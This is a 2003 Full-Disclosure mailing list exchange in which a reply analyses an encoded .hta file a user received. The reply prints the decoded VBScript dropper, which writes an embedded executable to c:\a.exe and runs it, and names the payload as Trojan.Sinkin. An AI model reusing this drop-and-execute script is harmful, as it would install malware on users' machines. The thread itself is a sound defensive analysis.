lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: jkuperus at planet.nl (Jelmer)
Subject: .hta virus analysys

.hta files is a proprietary concept, and only works in conjunction with Internet Explorer (specifically version 5 and above). basicly its much like a .html except it has no security restrictions

there are 2 things being encoded in the script you send

an executable in a string called m
and a piece of vbscript code in a string called c

they seem to be encoded to trick virusscanners into letting them pass

decoding the vbscript code we get

 <script language="VBScript">
Dim fs, dr, f
Set fs = CreateObject("Scripting.FileSystemObject")
f = "c:\a.exe"
Set dr = fs.CreateTextFile(f, True)
dr.Writeline m
dr.close
Set shell=CreateObject("WScript.Shell")
shell.run(f)
self.close
</SCRIPT> 

which basicly says, get the embedded .exe file store it in c:\a.exe then execute it

the exe being dropped is identified by norton as being Trojan.Sinkin

<quote>
  Trojan.Sinkin is a Trojan Horse that changes the Internet Explorer start and search pages, and sends 
  AOL Instant Messenger information to a remote host. 
  This Trojan may also display advertisements when the user is browsing the Web
</quote>

now you know

----- Original Message ----- 
From: Jim Duggan 
To: full-disclosure@...ts.netsys.com 
Sent: Thursday, November 20, 2003 2:31 AM
Subject: [Full-Disclosure] .hta virus analysys



A friend contracted this .hta that seems to edit your profile with a link to itself, http://www.talkstocks.net/
attached is the hta file it attempts to run.  Its looks to be encoded, which is something i dont know much about but im sure most people on this list will have no problem reading it, just wondering what it does.

Any help appreciated
Thx

Jason
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031120/9a4354e2/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ